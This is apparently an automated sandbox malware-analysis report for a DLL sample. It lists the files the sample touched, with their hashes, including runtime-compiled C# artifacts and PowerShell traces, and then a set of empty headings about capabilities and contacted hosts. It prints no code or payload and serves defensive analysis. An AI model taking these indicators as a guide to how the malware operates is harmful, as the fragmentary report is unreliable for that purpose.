C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BB5zDwX[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	C7DBA01C92D1B9060E51F056B26122BC	440F7FC2EE80D3A74076C6709219F29A31893F86	156AE4B3A7EF2591982271E4287B174CDC4C0EE612060AD23E5469ED1148D977
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BB6Ma4a[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	6D4A6F49A9B752ED252A81E201B7DB38	765E36638581717C254DB61456060B5A3103863A	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BB7hjL[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	D02BB2168E72B702ECDD93BF868B4190	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BBMW3y8[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	A7F47EA6749E7F983C2847FD037DEB7A	75E0D2C648EABA94110377FB04A4735FFFE78666	7DE0FB95FE9F84CFA3F6AD5C244EE32D5BCAC0D391326EBC57B6F97FB45B5B61
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\NewErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	DFEABDE84792228093A5A270352395B6	E41258C9576721025926326F76063C2305586F76	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\fcmain[1].js	HTML document, ASCII text, with very long lines, with no line terminators	3C3BDB478F8A60285BA364257103B8D0	B651EE0FF5845A49C9ECC1ABD04EE4DE031BB7F0	AE7C8650FEDCCBB2692E314987F680AB0B062930B6C1E2BB024458DADA738166
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_484294409eea1e180985393208e4901b[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	D08EF390EB7E6A533BEDDB3F786DBE21	A7A23E638A231758287104BCB6D419D5743C39CD	2CEE4A7B8FA9336599706A834F6E28B6184449B49BCD52AFCA1CB287E95B109E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_4b120f2220b473a2c1464788bf2bdada[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	A6F68B1F1A55D7D93F69C5E9DC727CA0	DEDD893DDDAD7FE42579105737897E986EA26C5F	BAAA020917B5675BF0557457C1D80ECB1AF681229FA17E334655EFFCFC25F7AC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_4e4051ae7feb3da403d1792461db2042[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	9052666C63F9B464EE984EDD5E886CE1	53C09A34AB813248DD36EF7ABD917BE1166CA663	91A48E83C15719B843759025E22F400AA74488B4E7937EDAD4258A910AEE6EA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_862708ae2126ffce6b0fd800bf183b80[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	86F37241079E452427EFE3AD4D0E9DC3	F83C0347C6A900B32825E487E4B2A4A3376CB572	DA91FCCAFB6D3EAA8D45D4A12F713212130D40002CC482225209E5FCD73134DE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\nrrV63415[1].js	ASCII text, with very long lines, with no line terminators	58A026779C60669E6C3887D01CFD1D80	FBD57BDE06C3D832CC3CB10534E22DCFC7122726	E4F1EDDBAD7B7F149B602330BD1D05299C3EB9F3ECB4ABD5694D02025A9559C9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otFlat[1].json	ASCII text, with very long lines, with CRLF line terminators	AF6480CC2AD894E536028F3FDB3633D7	EA42290413E2E9E0B2647284C4BC03742C9F9048	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otSDKStub[1].js	ASCII text, with very long lines, with no line terminators	EACEA3C30F1EDAD40E3653FD20EC3053	3B4B08F838365110B74350EBC1BEE69712209A3B	58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\55a804ab-e5c6-4b97-9319-86263d365d28[1].json	ASCII text, with very long lines, with no line terminators	46748D733060312232F0DBD4CAD337B3	5AA8AC0F79D77E90A72651E0FED81D0EEC5E3055	C84D5F2B8855D789A5863AABBC688E081B9CA6DA3B92A8E8EDE0DC947BA4ABC1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\AA7XCQ3[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	82E16951C5D3565E8CA2288F10B00309	0B3FBF20644A622A8FA93ADDFD1A099374F385B9	6FACB5CD23CDB4FA13FDA23FE2F2A057FF7501E50B4CBE4342F5D0302366D314
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\AAuTnto[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	BB8DFFDE8ED5C13A132E4BD04827F90B	F86D85A9866664FC1B355F2EC5D6FCB54404663A	D2AAD0826D78F031D528725FDFC71C1DBAA21B7E3CCEEAA4E7EEFA7AA0A04B26
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\AAyuliQ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	D675AB16BA50C28F1D9D637BBEC7ECFF	C5420141C02C83C3B3A3D3CD0418D3BCEABB306A	E11816F8F2BBC3DC8B2BE84323D6B781B654E80318DC8D02C35C8D7D81CB7848
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB15AQNm[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3	C701BB9A16E05B549DA89DF384ED874D	61F7574575B318BDBE0BADB5942387A65CAB213C	445339480FB2AE6C73FF3A11F9F9F3902588BFB8093D5CC8EF60AF8EF9C43B35
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1axKSh[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	9525988C54F2D7A419EE89575A3FD38C	3CC4F7F2D3D1BF69EAA739CB5185AE06CA45470F	C0B1D5D17DF76F880F8DBA2127E5875C6B96E290867F61ADF8923B849BFC0DC6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cHZXw[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3	A4E6B126149AC6750BF4BEC3EB0D8E29	AEE7D449F4D975756BF12A2ED795422B69CD0AC0	007262EE08ECA70F2B2BFE874F5F00B1971572D6E02D0BBC93894D21D824B7EE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cQDJf[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3	5849BD5294610A2EA0A5F819221B260C	A88C7166A269DFE057BB2A35DD0F46BE81D857B9	531F2E35A92F69AB27D55CC66B2D16AC4AC72A9CE5B40E6E4EAF8356EAA05AFA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cTErk[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3	8873ACC901F18E8B81CA6B151AA5FAE6	8192B11F0B8306AC76E8F3A740A6474DB01179F6	24E0418CF7842625533CD082E44E2AD5AF561FAF355CE3D19CA92706E44517CB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cTMen[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3	AA95FEEC7476917F11B8CEA4751513A9	8D733827CB6E6C541664F4043B9E958E65C4352D	61E083110A1C0F749F8342AFBE7C5FC2E4D656244FC4E91DA44D00373E12120F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cTPst[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3	7B8974D94D2DFA8C0886F9CAD0DD4628	DB760235005783EFBCBBB762653015E5D86D257C	DC3708F7511C1322EF73C91C90A3F1A372E5D33D9F7B7CD077118B57A7F5A0D3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cTuPv[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3	BF61754ADE7491C438834A3336D8E214	011875A3D01023875352BB91E840C4654135760E	612D288CFD8663B137A0D4B68EF14FC2E6FB1321F3CEE7D1AB6989654775FB21
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cUaCN[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3	600B01BF0DD6835661D30BB62CFBE1FA	9C34E4E4274F06B16BFECCE96C5B923EBE5EA81B	1E4E8528EBBD1B019A240568F1B57EFF44479BC95BCD8D7C73E87A65E743735C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cUmNz[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3	BA405196A6E2CF93995F02C1EF01BE93	AFAFE18E1B8AC82E26B07AED6807ABEC9A1BABD6	AAF2B6520A62D59755CD9CC9B1BA39542006B7EDC541594DB981FCEAD52F4599
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cUuXa[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	7E19ACEE202CAF4FD090A063D6A1E00E	C5123FFD4CA8AE4069A90C4BDBB8511986B6F37F	1FA59F90907342A5B07AD9C300AA73A91913EF4186AB46E6E485D342142DB7E5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1cUzTb[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3	DE2A929DA5D6450C0ED6A3931631C6B8	B2EB40A120BA43595D07BB4C9CDFACC3B5B0F024	6762225E068D820385DA255EE0F88255118E1174C65426DC446FEB26CCA70BA6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBUE92F[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	770E05618413895818A5CE7582D88CBA	EF83CE65E53166056B644FFC13AF981B64C71617	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBiwNf[1].png	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	98AA0D4C3552D47E16563B353B0152FC	D90E356FAA128D0D09CE63A70F10F5FC1AFF584A	A7B3C2F1BCD9839CC41289C0D8E7EF28793AAE21B306C25DB2815E35F54D6A3B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBnYSFZ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	CA188779452FF7790C6D312829EEE284	076DF7DE6D49A434BBCB5D88B88468255A739F53	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\a8a064[1].gif	GIF image data, version 89a, 28 x 28	3CC1C4952C8DC47B76BE62DC076CE3EB	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cfdbd9[1].png	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced	FE5E6684967766FF6A8AC57500502910	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\de-ch[1].json	UTF-8 Unicode text, with very long lines, with no line terminators	88AB3FC46E18B4306809589399DA1B04	009F623B8879A08A0BDD08A0266E138C500D52DB	4D4DF96DDF04BBC6255DFF587A1543B26FC23E0B825DEC33576E61B041C3973A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_70e11c440c0bef9f6c7634313dadb192[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	CE1CBD795A18AA1D9AFC994D625FC8CA	F21E398C22579A81558C5426EFB7EE4E8B1A009B	05BE281859F205361CC21856CAFFE41490184D3C40BF1AA8704D01F308B00E76
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\iab2Data[1].json	UTF-8 Unicode text, with very long lines, with no line terminators	EC3D53697497B516D3A5764E2C2D2355	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[1].htm	HTML document, ASCII text, with very long lines	384F42B66DF03E01CAE03D48D31EEC16	EC50E0AB86C9FB8C5859EF390AD242EFBA9A1D64	4966D5C932D4B2683D4F065D6CE2749E99F62B06220E4201BF3EEF6FDFE8CD1B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[2].htm	HTML document, ASCII text, with very long lines	8D31229FDD9E25BF3992B4091CD31F64	D32C9C6B906E9DC86A18AC0B2ACDC2E74D3C9144	261887CA4E89C5AEB9890B187960707346EB34BE6E2B84C9CA468B1F332C9CF7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otBannerSdk[1].js	ASCII text, with very long lines, with CRLF line terminators	DA186E696CD78BC57C0854179AE8704A	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otTCF-ie[1].js	UTF-8 Unicode text, with very long lines, with CRLF line terminators	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\RES8C67.tmp	data	6A801321C3CC69A68DFD658FC1DEC843	B15A742C3907AAA44433E7F1231DAE843AA8EB3F	1F9B5A98F9F3E54FC2816F3B0C9C1ED7EB3F952C34741593E73F11BB631A01C1
C:\Users\user\AppData\Local\Temp\RES9D01.tmp	data	254C31708367B030BE456C8AEBC2F298	EE80F6F9352B85DD67062609505424071D6440C2	6C7D1CF9FD4F3DC9F97477C309D7FE3B200A081764885BB143E89E21F7F5ACEE
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0etuftmt.umd.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nicyzle2.hvq.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP	MSVC .res	3079DEF177AB694E184F1BA62A06F058	5B704965AAFBFD6D0BDE9E779DDE0D0F347BB0A9	1146A4322C56DBA144616E2A0F4CAA72AED431592D0F73E4A6B87DCA9D4649EC
C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.0.cs	UTF-8 Unicode (with BOM) text	E6783D4478DED333CF3CDF5890B4797B	25794B2DE4EA900DBC1FB77CC87A492F96627027	679B90A8046177D7F89C8FCE2FA5CF91C548FD819E0E5272651BA2F655594770
C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	76D1C591F0D835C0DC0696B3F05747D7	D3884AE82EA314A371BA3C0E047D7C08FFD3D5B6	E71CEE2260A82EE3725FEDA381BEFAC0087807E2FFA841552AE1B04559DCB31C
C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	FB57B3CD424CBD7CF2BAD57C301A27F6	D74EC1FA53427FD8E736A204C6063EEFBDA6680A	E84696786EF5D3B2B61611928CF4FE000103A52E7295E33F1075B488E3FF399A
C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP	MSVC .res	D742C433870305540B84D90F89CAE46B	90C2123030FDCC3EAFBD53FFD9FFD8411CCF34BA	94FA7CE61194499D57664F4E4B03D935E19A0AD538E9805DA1692EDEFDF3C5B5
C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.0.cs	UTF-8 Unicode (with BOM) text	B51D375352619766FF9E41EF8E39C000	AED407136DB175CB13331C6203781C7A29414F8C	DA74E408FA077334B3B0F9602FE873D56965700477997BE9D04C0722AE3546A7
C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	E6D221E6482CAACB9C47076549CD4685	3D6840AA70B68013EA0240E55427BE6CA24C1329	7AD311FD7D1A5E7D5CFF3A230C7632438F6266C8B035F86E248C07A46F6455A2
C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	26B757562A07578C0BA33EB1E399D858	D71E01CDA41D349E7A33359701E30CD15B34B1EF	4F8512E93C60DB78FD4A1E1A8CDB8AA8D8D850E423E692C35B3C2BFC124181EE
C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF0C8AB4752B6ABECF.TMP	data	93ECEA6BFAB18FC98E9E56A9B467ED37	CD03EE545182D89F01AF94BCB9450D45A5DED113	FD1556AB7A6DACAAF3AF9664A5AD54EBD51DA235FEAD742BF9FA6FF549D25822
C:\Users\user\AppData\Local\Temp\~DF0FAF52556EC2F72E.TMP	data	348D422E9E8461A42BB82F8487EB7FD9	52358EA249226F5B764CCAEC10D8846F27759A41	E0761A95FBC47B246C5C1F3E9F95DEADCB3BF7C48EED49F7E46684DC7F0A4B5A
C:\Users\user\AppData\Local\Temp\~DF4C57DF82C221FA30.TMP	data	0EC39F8FD535D3AF937D1393375FEADC	EB84803A41D5236E8C878356A5F6168EB8DD23A6	3A999A51A3B8A54F45A7F2671B790706B37EED085E668C36007EA0BC0F9F7B43
C:\Users\user\AppData\Local\Temp\~DF6EC85E7A5CABE297.TMP	data	1CC396224D4481D71EECA0513A584ECB	2B74EAE8F7593A5188FE9A53356C49CB9E097CA9	29A28756546E7D274A669FE982ABB3515A116443CB2A0C9EA4B9AC40888496D1
C:\Users\user\AppData\Local\Temp\~DF9B1E57DEDF99BFAF.TMP	data	96D8B3FE1A1225CEDC10BA23EF687384	9D43696782E281C792A7826638C60F385C4D2ACA	E47ED8BEB41E7C35B27FE141E1B32872F9E9001BB83C921E5CEB02BA57B90B49
C:\Users\user\AppData\Local\Temp\~DFA1BDE05E7BEC4C25.TMP	data	32ED82DC7EE720AE982C412EC60A6B88	0B6E843715AF826CCD17B5BC60F86BA862CB6B3E	17C4E21AE4490190BA126E638279DECFF892E6D62B3F1D4BF6EF27A8F896194E
C:\Users\user\AppData\Local\Temp\~DFC1C3D96CC3EDB6AE.TMP	data	BEAD21820009AB09AD0407417C370F89	EA4BC0EBA112A71F2CCD86F31A46D92B3FDCDAEF	108BFF005A0368085727EDB57B1416954BFFAF7ED101D1EB2C293561DB63F6CB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5M4U9P29ERWFOUU8TFGJ.temp	data	F828B63BDCD74252C9803310D2526343	9CC319C69BFCEFF72DF0D265C8BB7F55F59CAFF5	81CDC9F0E4B930CD68098541DC7CBE5A9F16CA7C28095F51AF413F8D406A4F81
C:\Users\user\Documents\20210120\PowerShell_transcript.494126.vNPZg1CA.20210120074811.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	737F0C25EAA35E610B0886535EF73BD2	9E31487079667B6EC5D647D0EA52454A19EC6430	5B14736DFF5FD015575DF50ED54B321BF385804AFF1B0A2610F496A78EFF1D5D

Analysis Report 6007d134e83fctar.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs